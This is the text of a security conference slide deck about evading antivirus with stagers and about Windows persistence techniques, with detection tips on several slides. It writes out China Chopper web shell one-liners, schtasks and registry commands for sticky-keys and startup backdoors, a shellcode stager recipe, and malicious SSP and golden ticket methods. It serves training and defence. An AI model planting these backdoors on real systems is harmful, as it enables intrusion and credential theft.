the supporting role of antivirus evasion while persisting

The Supporting Role of Antivirus while Persisting

@ChrisTruncer

Christopher Truncer

Previous Systems Administrator turned Red Teamer

Red Team Lead at Mandiant

Florida State Seminole

Open Source Developer

@ChrisTruncer

What’s this talk about?

◉ How Stagers Work◉ Case Study: Bypassing a Signature◉ The Right Way to do Detection◉ Persistence - lots of it! :)◉ Old School and New School Techniques◉ Persistence Detection◉ Questions

Antivirus Evasion

Antivirus Evasion

◉ Whites hats and attackers need to evade antivirus

◉ Evading to establish immediate C&C of compromised system

◉ Also used to maintain access on a system/in a network

Antivirus Evasion

◉ If required to use an executable, we’ll use a stager

◉ Stager - Veil-Evasion or MSFVenom output◉ Inject shellcode into memory◉ Shellcode will download and inject a reflective dll◉ A “loader” for your real malware

Stagers

◉ Stagers can be developed in any language that can interact with the Windows functions

◉ It’s not hard to write a stager○ Just four function calls

Stagers

◉ Allocate memory to store shellcode, and set the proper memory permissions

◉ Copy shellcode into the allocated memory◉ Create a thread to execute the shellcode◉ Have code wait until thread is done executing

Stagers

◉ VirtualAlloc◉ RtlMoveMemory◉ CreateThread◉ WaitforSingleObject

AV’s Approach to Catching Malware

Methods of Detection

◉ Signature Based○ This is what Veil-Evasion targets

◉ Heuristics Based◉ Crowd Sourced

○ Reputation Based

Veil’s Approach to Bypassing AV

Approaches to Bypassing AV

◉ Ghost code / net no-operation code◉ Encrypted binaries

○ Hyperion

◉ Custom Code

Veil’s Approach

◉ Fight on-disk detection through different techniques○ Obfuscated code○ Encrypted code○ Non-standard languages for Windows binaries

■ Python, Ruby, Perl, etc.○ Shellcode-less binaries

Veil’s Approach

◉ Languages within Veil-Evasion○ Python○ Perl○ PowerShell○ C#○ C○ Go○ Ruby

Veil’s Approach

◉ Using a language that’s not C or C# made a large difference○ AV programs didn’t know or couldn’t properly inspect

non-standard languages

◉ Example:○ C vs. Python

Simply changing the language the code is written in

completely bypassed all signatures.

Veil Module

Veil Module

◉ Add a little complexity, so it isn’t just easily obvious what is happening

◉ What about encrypting the code?◉ What about making the tool brute-force its own

key?

Stallion

◉ Generate a random encryption key, that is artificially constrained○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567

◉ Test for a known string with decryption key○ If it doesn’t match, it’s the wrong key○ If it matches, decrypt the shellcode and inject it into memory

Signature Bypass

Signature Bypass

◉ After approximately one year, Veil had its first AV signature

Signature Bypass

◉ I was excited to see if someone finally figured Veil-Evasion out○ It is open source…

◉ Previous attempts have turned out fairly humorous

Persistence

Hosts vs. Networks

Persistence Purposes

◉ Persistence is commonly used to for one of two purposes:○ Persisting on a host○ Persisting a network

◉ A lot of the techniques I will cover can facilitate access for both purposes

Persisting Hosts

◉ When persisting a host, an attacker is looking for ad-hoc, or programmatically defined access, to a system○ Attacker want this as close to on-demand as possible

◉ The efforts undertaken by an attacker are directed to maintaining access to a specific host

Persisting Hosts

◉ What’s needed for persisting hosts?○ Survive Reboots

■ Probably the most important concept○ Have administrative rights on the system○ Compliment network based persistence

Persisting Networks

◉ Network based persistence in two contexts○ Used to maintain access into a network

■ Similar to host-based persistence, but its purpose isn’t for access to host, but the network

○ Used to maintain access into different networks■ Don’t want to be VLANed off in in a VOIP network

Persisting Networks (continued)

◉ What’s other network based persistence options?○ Attackers can use persistence not only to maintain access to

a network, but also obtaining their required domain permissions on-demand

○ Access likely facilitated through a host-based persistence technique

Persisting Networks

Web Shells

◉ Funny, this seems trivial and too easy that no one would ever use this…

◉ ...that’s not the case○ China Chopper - APT17, APT19, APT22○ ITSecShell, reDuh, ASPShell○ Even commodity code

China Chopper

◉ Very tiny webshell, about 4kb stored server side◉ Developed in a variety of languages

○ CFM○ ASP○ PHP○ Etc.

◉ A client application is used to interact with the webshell

China Chopper Server Code

◉ ASP○ <%@ Page

Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

◉ PHP○ <?php @eval($_POST['password']);?>

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

China Chopper

◉ Really useful features in China Chopper○ File Explorer○ Upload/Download files○ Mod file timestamp attributes○ Database client - MSSQL, MySQL○ Command shell

Web Shell Prevention & Detection

◉ Hunt/Sweep for known bad files○ Hashes, or other file based indicators

◉ Blacklist all filetypes except expected files for upload functionality

◉ Don’t allow your web server to execute files uploaded from untrusted sources

Magic Packet

◉ Or “how to access port 12345 with a packet to port 443”

◉ The attacker’s problem:○ Compromised a web server (port 80 and 443 are in use)○ Firewall(s) prevent connection to any other port○ Wants a TCP backdoor to be remotely accessible

■ Can’t be bothered to write a webshell

Magic Packet

◉ Run backdoor listening on port 12345◉ Run malware “low” in the network stack

○ Check incoming TCP SYN packets○ When a SYN packet is received with a specific signature,

change destination port from 443 to 12345○ Windows network stack then delivers the pack to port 12345○ Malware alters the port in all subsequent packets for the

stream

Syn, dport: 443data=s3cr37

Mal

war

eSyn, dport: 12345

SynAcksport: 12345

SynAcksport: 443

1234

5

Compromised System

443

Magic Packet - Defenses

◉ This malware was installed via a custom compiled executable○ Application Whitelisting○ Device Guard

Outlook

◉ Outlook rules can help provide a very unique on-demand foothold onto a host

◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system

◉ Provides access immediately when Outlook triggers the rule

Outlook

◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received

◉ Attacker will sync the rule against the target user’s account

◉ Send an e-mail with the trigger in the subject◉ Get shell :)

Outlook - Additional Tweaks

◉ Have another rule auto-delete the incoming e-mail to prevent user detection of the trigger○ https://silentbreaksecurity.com/malicious-outlook-rules/

Outlook - Detection

◉ Honestly, not certain on the best means to detect this at scale

◉ Primary IOC is to execute a program when receiving an e-mail○ I don’t know if any legit use cases for this

Persisting Hosts

Registry Hacks

◉ This is the 101 method for persistence that almost everyone learns

◉ Extremely easy to set up, and can be installed with a range of permissions

Registry Hacks

◉ These can be configured to run when the system starts, or a user logs into the system○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\R

un○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\R

un

◉ These methods are highly publicized and well known.

◉ Defensive tools look for these

Registry Hacks - Takeaway

◉ These can be good for maintaining initial access, but not for long term use

◉ SOCs - you want to have the ability to detect these

Startup Folder

◉ Your system will execute files in the startup folder○ C:\ProgramData\Microsoft\Windows\Start

Menu\Programs\Startup

Scheduled Tasks

◉ Scheduled tasks are an easy way for a user of any level to persist on a system

◉ With the proper permissions, you can schedule a task up to the SYSTEM level

◉ This is Microsoft’s recommendation/alternative to using “at” jobs

Scheduled Tasks

◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI

◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc.

◉ Tasks can run binaries, PowerShell one-liners, and more

Scheduled Tasks

◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\users\chris\downloads\safe.exe

◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\totallylegit.exe /s winsqldbsystem

Scheduled Tasks - Detection

◉ Obtain a baseline of the scheduled tasks set to run on your systems○ Schtasks /query○ Task scheduler○ Etc.

◉ Audit systems and identify deviations from your baseline

Service Manipulation

◉ Services usually run with SYSTEM level permissions, so can be juicy targets for attackers

◉ Easy way to install service based persistence? Check service binary write permissions!

Service Manipulation

◉ Now that you found services that can be modified, you just need a service binary.○ Veil-Evasion, PowerUp, custom code

◉ Save the original service binary◉ Bounce the box (or service) if required

Sticky Keys

◉ With administrative access to a machine, you can easily setup sticky keys○ Copy sethc.exe○ Copy cmd.exe to C:\Windows\System32\sethc.exe○ Reboot, and hit shift five times

Sticky Keys - Another Method

◉ Set cmd.exe as the debugger for sethc.exe◉ REG ADD

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Sticky Keys - Another Method

◉ Main problem - doesn’t require authentication◉ If using Sticky Keys, ensure it’s calling back to a

location you control, vs. opening up the system for everyone

Sticky Keys - Detection

◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary

◉ Ensure no registry key is added defining a debugger for sethc.exe

New School Persistence Techniques

DLL Search Order Hijack

◉ DLL search order hijacking exploits how windows searches for DLLs when loading an executable

◉ Specifically, it exploits the fact that Windows will always search the currently folder of the executable for a dll

DLL Search Order Hijack

◉ Sample in CAPEC○ If you drop ntshrui.dll within C:\Windows and run

explorer.exe, you can get the dll within C:\Windows to be executed

◉ This exploits the order in which the dll is searched for on a Windows system

DLL Search Order Hijack

◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system

◉ Since it’s every time the application runs, it can be used as a persistence technique

◉ PowerUp can be used to find these opportunities

DLL Search Order Hijack

◉ Used by the following actors:○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26

◉ Used by the following malware:○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER

Legitimate Scheduled Tasks

◉ Easy to identify scheduled tasks named “Evil task”

◉ First we must look at how investigators detect malicious scheduled tasks

Legitimate Scheduled Tasks

◉ Stacking tasks across multiple systems to determine anomalous tasks

◉ Parse task scheduler log (schedLgu.txt)

Legitimate Scheduled Tasks

◉ What if we modify existing legit scheduled tasks?○ Specifically tasks that are

not required for Windows functionality

Unquoted Service Paths

◉ Unquoted service paths exploit a vulnerability in the order that Windows searches for a binary when a space is in an unquoted path○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe

Unquoted Service Paths

◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe○ C:\Program.exe○ C:\Program Files(x86)\Steam\Steam.exe○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe

◉ Three opportunities

Unquoted Service Paths

◉ If we have write access to any of the paths that Windows looks for, we can hijack the service○ Just need a service binary

◉ Drop it into any of the paths on the previous slide, and restart the service○ Might need to wait for a reboot

Unquoted Service Paths - Prevention

◉ Check service binaries on your images and determine if any are using unquoted service paths.

◉ Make sure the paths aren’t writable to non-admins.

◉ PowerUp can find these as well

WMI Requirements

◉ Event Filter◉ Event Consumer◉ Filter/Consumer Binding

WMI Requirements - Event Filter

◉ The WMI query that fires upon an event occurring○ Usually, an event class derived from

__InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent

WMI Requirements - Event Consumer

◉ There are five different event consumers○ The most interesting one is “CommandLineEventConsumer”

◉ These “consume” or act on events that occur

WMI Requirements - Filter/Consumer Binding

◉ This associates a WMI Event Filter with the Event Consumer

WMI - Persistence

◉ PowerSploit’s persistence module for WMI○ Automates the creation process○ Will create a permanent WMI event subscription

PowerShell Profiles

◉ Anytime PowerShell runs, it will execute code in the default profile

◉ Create profile code here:○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.p

s1

PowerShell Profiles

◉ Use standard persistence mechanism to execute PowerShell silently○ "C:\Windows\System32\WindowsPowerShell\v1.0\powers

hell.exe" -NonInteractive -WindowStyle Hidden○ It’s a legit exe!

PowerShell Profiles

◉ Example in profile.ps1:○ iex("write-host 'hello world'")

Security Support Provider

◉ A Security Support Provider (SSP) - a security package○ An extension used to perform authentication during

client/server exchange

◉ An Authentication Package (AP)○ Extends interactive login authentication○ Example: RSA tokens

Security Support Provider

◉ SSP/AP○ Can serve tasks of SSPs and APs - loaded into lsass at boot○ Example: Kerberos and msv1_0 (NTLM)

Security Support Provider

◉ Install your own SSP that is loaded into lsass.exe◉ Can develop your own SSP DLL◉ Use Persistence module in PowerSploit to install

your malicious SSP

Security Support Provider

◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll○ Once installed and loaded into lsass.exe, it captures

plaintext passwords

Excel Magic

◉ Malicious macro executes backdoor◉ How can you ensure persistence?

○ Most users will run Excel once a day○ You can use any “old school” techniques to spawn Excel○ Disable macro settings to run macro without user prompt

Excel Magic

◉ Registry modification that opens specific Workbook upon starting Excel○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Ex

cel\Security\Trusted Locations○ Just add the location

Additional Persistence Opportunities

Golden Tickets

◉ Method was developed with Ben Delpy and Sean Metcalf

◉ Forges a “golden” kerberos ticket which can be good for 10 years!

◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain

Golden Tickets

◉ Only need four pieces of information○ Domain SID○ Name of the domain○ User you want to create a ticket for○ Krbtgt account hash

◉ You can build your ticket at home, offline

Golden Ticket Takeaways

◉ If impersonating an account, tickets are still valid even if password changes

◉ Valid for as long as you specify (10 year default)◉ Domain trusts

○ Child domains can compromise the parent

◉ Only way to stop is change krbtgt hash… twice…◉ Or rebuild from bare metal

Account Checkout - Case Study

◉ Client had account checkout system for domain administrator accounts

◉ Only two users with access to checkout system◉ System requires 2FA◉ DA access is lost if user changes their

password/pin/token◉ Users can see checked out accounts

Account Checkout - Case Study

◉ Persist domain administrator without getting caught○ Can’t continuously check out accounts

◉ Password vault permissions were managed through Active Directory groups○ Tons of them

Account Checkout - Case Study

◉ Copy group memberships to a compromised user account○ User doesn’t use the Password Vault

■ All changes were documented

◉ This gave us all the permissions we needed without needing access to their Password Vault

Account Checkout - Case Study

◉ Copy group memberships to a compromised user account○ User doesn’t use the Password Vault

■ All changes were documented

◉ This gave us all the permissions we needed without needing access to their Password Vault

Conclusions

Conclusions

◉ Persistence will remain rampant◉ Always new and creative ways to maintain

persistence◉ Understanding persistence techniques is critical

to detecting attacker access

Thanks!

ANY QUESTIONS?

@ChrisTruncer

Christopher.Truncer@mandiant.com